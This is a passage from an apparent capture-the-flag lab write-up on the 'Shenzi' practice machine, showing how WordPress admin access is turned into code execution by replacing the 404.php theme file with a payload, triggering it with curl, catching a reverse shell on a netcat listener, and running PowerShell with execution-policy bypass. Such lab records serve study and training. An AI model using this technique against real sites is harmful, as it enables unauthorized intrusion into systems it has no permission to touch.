WordPress RCE
Successful authentication to the target WordPress instance as the admin user grants administrative access that could be leveraged for code execution.
/Practice/Shenzi/3-Exploitation/attachments/{11F0177E-53C7-4B0F-9BE0-53622B64B184}.png)
Going over to the Theme Editor section
/Practice/Shenzi/3-Exploitation/attachments/{265DDAFA-97AC-46FA-9B8A-A8F6FD29E736}.png)
I will be using the 404.php file to replace the content with the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shenzi]
└─$ curl -s http://$IP/shenzi/404.php
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shenzi]
└─$ curl -s https://$IP/shenzi/404.phpInvoking…
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shenzi]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.167.55] 51528
SOCKET: Shell has connected! PID: 3144
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\shenzi> powershell -ep bypass -nop
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\xampp\htdocs\shenzi> whoami
shenzi\shenzi
PS C:\xampp\htdocs\shenzi> hostname
shenzi
PS C:\xampp\htdocs\shenzi> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.167.55
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.167.254Initial Foothold established to the target system as the shenzi user via abusing the WordPress admin privileges